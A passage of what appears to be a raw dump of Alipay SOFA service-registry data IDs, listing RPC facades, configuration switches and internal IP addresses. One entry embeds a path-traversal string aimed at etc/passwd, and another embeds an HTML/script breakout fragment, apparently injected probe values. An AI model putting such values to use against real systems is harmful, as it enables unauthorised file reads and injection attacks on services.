aultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:pcreditdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_infosecmngDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.blackbox.BbVisibleResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.68.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.prodmng.api.FundCalendarQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zim.service.mobile.api.ZimDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ikbservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmerchantprod.integration.acctransquery.AcctransqueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheServerSwitch.customerTagStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.pricemng.core.service.api.service.PricePrivScopeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.crep.request.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.express.ExpressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.back.RelationLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpayprod.senior.common.service.facade.family.api.FamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.ucdp.UcdpCreativeTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.FlowModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_FAULT_ISO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.metadata.common.service.rest.node.RestNodePushService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_HDWONS_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequote.api.L2DealTransactionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.prepaidcard.PrePaidCardVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.biz.manager.config.RulemnglibManagerResource.rulemnglibConfigurationJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.mng.ScenePageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.manager.ClientBasicMetadataManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.CouponConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliHeartBeatFacade:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.profile.UserDimensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.60.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.apsdk.settlement.apis.MerchantContractsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:cardbin@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.shard,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanrepayprod.common.service.facade.service.restruct.RestructRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_SECURITYPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.app.AppRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebTransferInSignService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdetail.facade.DishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zmepratingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.plugin.api.PluginDishInnerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:omoaidbase_filemovecallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.notice.NoticeTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditHzGoOrderEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodelcore.common.service.facade.api.PhysicalDatasourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.dispatch.api.PointDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.client.dr.DRSwitchDispatcher:1.0:esmp-hbase-dr-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.securitycap.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditauthcore.service.api.PcreditGuaranteeOptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.InterestDataSourceDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:buspromosff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_CLEARINGCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_FOREX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:rpc-route-rz-client@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapTenantService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.OrderCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.CycleCardServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.biz.service.impl.fundmanage.activitycenter.service.RightService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.ray.serving.common.service.facade.GlobalService:1.0:servingkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:fundmngStateResolver@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.FinanceAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:userview_cz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.meta.MetaBaseHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.repay.LoanRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1103#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingprod.common.service.facade.use.MktUseDiscountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finmodelcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.style.SceneBlockStyleMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:inssdu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.luckyPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:coreQualityPlus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:pcreditBizCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpaas.zpaas_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.mide.common.service.facade.api.speed.SpeedUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.common.service.facade.AirAutoFlowStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransferQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RecoverAccidentalItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ApInvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.api2.SelfMarketingActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcms.common.service.facade.voice.VoiceBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GFINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.activityNumLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmtcaftscmdproc.common.service.facade.OtaUpgradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:ischedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BBC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.170.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.187.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iexchange.service.facade.api.ExchangeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:vouchercore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lightmds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almcenter.service.facade.api.funddiversion.FundSwitchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_deleteVoucher_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:xtech@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.core.service.drm.impl.AuditControlDRMImpl.updateConfigId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.monitor.MetricFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.ChangeNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.LogLevelSwitchConfig.logLevelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exchangecore.common.service.facade.api.PortfolioQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ExceptionLegoAlarmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.selfoptmng.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fincommontaskhub.service.facade.console.TaskServiceConsoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.StagedUnfreezePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.YEBVirtualTAConfigDrm.loadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","id.dana.bizcenter.common.service.facade.api.BizProviderManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_RULEUPD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:finprodmngFilingAgreementCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.baopoint.api.BpctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.180.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antassistant.biz.rest.ContactAsrInfoRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.80.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chargefront:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.product.service.ProductRateRangeStaticInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bksmartdetect-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bbcmng.common.service.facade.PaycheckerDynamicRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcStandardTransFacade:1.0:ecftrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:minitranscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.ecoqltopen.facade.detect.DetectTaskOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CIFPROCESS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reservecenter.facade.api.OuterInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FinfundtradeGzoneDrmConfig.gzoneInstApplyOrderIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.integration.finbaservice.PartnerPropertyFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.CustomGrayRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.RiskCheckOptionConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.operation.facade.AssetReqOrderDeliveryDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_DISSEMINATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoaftermarket.common.service.account.AutoAfterAccountFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.PrecollectItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizprodsys.common.service.facade.epidemic.EpidemicSituationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.CorpAppLifecycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.facepay.Face2FacePayRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkLearnMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.open.AssetMartCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.130.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpay.common.service.facade.query.QueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditQueryAuthOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.EtcSkuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.UnifygwSpiFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocontent.common.service.facade.api.da.DdataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_GRDC_GLOBAL_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.apm.facade.valuation.ValuationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.TemplateLibManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.signcontract.SignContractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:customscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.GlobalRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.price.InquiryPriceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icharge.service.facade.api.IfcConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mrchasset-assetcommontask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.uat.UTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.datacube.common.service.facade.facade.TyInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.correct.ProductCorrectFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountMemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseCoordinatorFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isecurityexprod.common.service.facade.icif.AccountScoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.core.service.repository.TransferInstructionRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.playbackmng.zplayback.manytimescompare.ManyTimesCompareReportManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.ConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResSceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.engine.template.TemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:emcooperate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppStageManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:monitorActionStatusTaskLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustprod.common.service.facade.api.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opsconfreg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ALMCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.0.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:pcreditmerchant-workflowxRPCInvocationFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:robothelper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.smartFoEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.service.facade.api.dynamicview.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_IN